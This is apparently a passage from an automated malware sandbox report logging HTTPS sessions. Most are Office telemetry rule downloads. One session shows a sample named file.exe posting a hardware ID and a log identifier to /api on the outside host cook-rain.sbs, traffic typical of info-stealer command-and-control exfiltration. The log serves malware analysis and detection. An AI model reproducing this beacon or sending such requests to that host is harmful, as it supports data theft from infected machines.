                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      5192.168.2.74970813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:25 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:26 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 450
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                      x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164126Z-185f5d8b95ckwnflhC1NYCx9qs0000000ag000000000rv4s
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      6192.168.2.74970713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:25 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:26 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 3788
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                      x-ms-request-id: f909c6c7-c01e-0049-518c-3aac27000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164126Z-r1d97b99577656nchC1TEBk98c000000094000000000gpf9
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      7192.168.2.74970913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:25 UTC192OUTGET /rules/rule120100v3s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:26 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 1000
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB097AFC9"
                                                                                                                                                                                                                      x-ms-request-id: e8aec935-001e-0046-54a1-3ada4b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164126Z-185f5d8b95csp6jmhC1NYCwy6s0000000ac000000000uk0a
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC1000INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 35 22 3e
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH T="5">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      8192.168.2.749712104.21.66.384437476C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=JLK8KI1ZQOJ8
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Content-Length: 12814
                                                                                                                                                                                                                      Host: cook-rain.sbs
                                                                                                                                                                                                                      2024-11-20 16:41:26 UTC12814OUTData Raw: 2d 2d 4a 4c 4b 38 4b 49 31 5a 51 4f 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 44 32 32 38 38 35 46 32 31 41 36 46 31 30 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 4a 4c 4b 38 4b 49 31 5a 51 4f 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 4c 4b 38 4b 49 31 5a 51 4f 4a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4a 4c 4b 38 4b 49 31 5a
                                                                                                                                                                                                                      Data Ascii: --JLK8KI1ZQOJ8Content-Disposition: form-data; name="hwid"F5D22885F21A6F1063CFCF7E6C45F838--JLK8KI1ZQOJ8Content-Disposition: form-data; name="pid"2--JLK8KI1ZQOJ8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--JLK8KI1Z
                                                                                                                                                                                                                      2024-11-20 16:41:27 UTC988INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:27 GMT
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=hbetteucgdktm6sefnajj9sb20; expires=Sun, 16-Mar-2025 10:28:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RqgXPfathHLcfdBbClTTCIRpLjWSp3pF%2BPaCWttbPFSwI0UkFvdInRpDzRuykDDfTDqnt7WZzpQ%2BefJ1EGLOHc0Z%2FB%2Fa%2FSgsqxcYHRA2ZDIIAXvJXhzm7W0eGsIvAeiR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 8e59e3356f4241bd-EWR
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1777&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13745&delivery_rate=1599123&cwnd=247&unsent_bytes=0&cid=473508c370e27713&ts=910&x=0"
                                                                                                                                                                                                                      2024-11-20 16:41:27 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                      Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                      2024-11-20 16:41:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      9192.168.2.74971613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:28 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 632
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                      x-ms-request-id: 70a275ef-201e-0051-048c-3a7340000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164128Z-r1d97b99577jlrkbhC1TEBq8d0000000092g000000004mr0
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      10192.168.2.74971413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:28 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                      x-ms-request-id: bfe6cc7a-201e-006e-7e8c-3abbe3000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164128Z-r1d97b99577jlrkbhC1TEBq8d0000000090g00000000c1mg
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      11192.168.2.74971713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:28 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                      x-ms-request-id: 3126d9de-f01e-0099-4d8c-3a9171000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164128Z-r1d97b99577kk29chC1TEBemmg0000000970000000007ecc
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      12192.168.2.74971313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:28 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                      x-ms-request-id: e579fe48-a01e-001e-648c-3a49ef000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164128Z-r1d97b99577jlrkbhC1TEBq8d000000008xg00000000ny1f
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      13192.168.2.74971513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:28 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                      x-ms-request-id: 1e988f1d-b01e-0070-1b8c-3a1cc0000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164128Z-1777c6cb754g9zd5hC1TEBfvpw00000009wg00000000vadb
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
